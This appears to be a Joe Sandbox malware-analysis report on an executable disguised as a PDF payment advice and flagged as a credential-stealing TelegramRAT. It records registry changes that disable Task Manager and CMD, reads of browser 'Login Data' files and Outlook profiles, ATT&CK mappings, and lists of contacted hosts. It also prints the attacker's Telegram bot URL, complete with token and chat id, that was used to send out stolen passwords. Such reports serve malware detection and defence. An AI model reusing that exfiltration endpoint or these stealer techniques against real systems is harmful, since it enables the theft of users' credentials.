            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3943
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3762
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_0040649A LdrInitializeThunk,WideCharToMultiByte,GetProcAddress,4_2_0040649A
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeProcess created: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeQueries volume information: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe PID: 7788, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe PID: 7788, type: MEMORYSTR
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe PID: 7788, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe PID: 7788, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe PID: 7788, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PAYMENT ADVICE 750013-1012449943-81347-pdf.exe58%ReversingLabsWin32.Ransomware.TelegramRAT
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsv30DA.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.17.46
            truefalse
              high
              drive.usercontent.google.com
              172.217.17.65
              truefalse
                high
                reallyfreegeoip.org
                172.67.177.134
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    193.122.6.168
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.org/IWPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3023221846.0000000037598000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E98000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E48000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.000000003505B000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034FB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034FB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.jsPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.google.com/PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.0000000004938000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2168450454.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2214513008.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.00000000049A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034C41000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CC0000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E98000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E48000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.000000003505B000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034FB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://checkip.dyndns.org/9WPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3023221846.0000000037598000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.google.com/KPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3001687513.0000000004938000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://apis.google.comPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149844924.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2149691379.000000000499C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.comPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CC0000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E98000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E48000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.000000003505B000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034FB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://nsis.sf.net/NSIS_ErrorErrorPAYMENT ADVICE 750013-1012449943-81347-pdf.exefalse
                                                              high
                                                              http://api.telegram.orgPAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E98000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034E48000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.000000003505B000.00000004.00000800.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034FB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://drive.usercontent.google.com/0329190839Z0PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2168450454.00000000049AB000.00000004.00000020.00020000.00000000.sdmp, PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000003.2214513008.00000000049AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/PAYMENT ADVICE 750013-1012449943-81347-pdf.exe, 00000004.00000002.3021658495.0000000034CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      149.154.167.220
                                                                      api.telegram.orgUnited Kingdom
                                                                      62041TELEGRAMRUfalse
                                                                      193.122.6.168
                                                                      checkip.dyndns.comUnited States
                                                                      31898ORACLE-BMC-31898USfalse
                                                                      172.217.17.46
                                                                      drive.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      172.217.17.65
                                                                      drive.usercontent.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      172.67.177.134
                                                                      reallyfreegeoip.orgUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1578318
                                                                      Start date and time:2024-12-19 15:27:05 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 7m 9s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:6
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 96%
                                                                      • Number of executed functions: 153
                                                                      • Number of non-executed functions: 113
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
                                                                      TimeTypeDescription
                                                                      09:29:01API Interceptor6427x Sleep call for process: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      149.154.167.22066776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                            D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                    chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                        urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                          193.122.6.168PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • checkip.dyndns.org/
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          checkip.dyndns.comOverheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 132.226.8.169
                                                                                          Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 132.226.247.73
                                                                                          PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 193.122.6.168
                                                                                          RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          api.telegram.org66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                          • 149.154.167.220
                                                                                          urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                          • 149.154.167.220
                                                                                          reallyfreegeoip.orgOverheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.21.67.152
                                                                                          HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 172.67.177.134
                                                                                          66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 172.67.177.134
                                                                                          _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.67.152
                                                                                          0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.67.152
                                                                                          Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.67.152
                                                                                          PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 104.21.67.152
                                                                                          RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 172.67.177.134
                                                                                          Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 172.67.177.134
                                                                                          PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 172.67.177.134
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          ORACLE-BMC-31898USx86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 144.25.16.134
                                                                                          Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 150.136.65.7
                                                                                          sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 193.123.7.187
                                                                                          66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 193.122.130.0
                                                                                          la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                          • 129.148.164.81
                                                                                          la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                          • 132.145.4.150
                                                                                          _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 158.101.44.242
                                                                                          PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 158.101.44.242
                                                                                          TELEGRAMRU66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                          • 149.154.167.99
                                                                                          QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                          • 149.154.167.99
                                                                                          _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          • 149.154.167.220
                                                                                          PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          • 149.154.167.220
                                                                                          chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                          • 149.154.167.220
                                                                                          chrome11.exeGet hashmaliciousUnknownBrowse
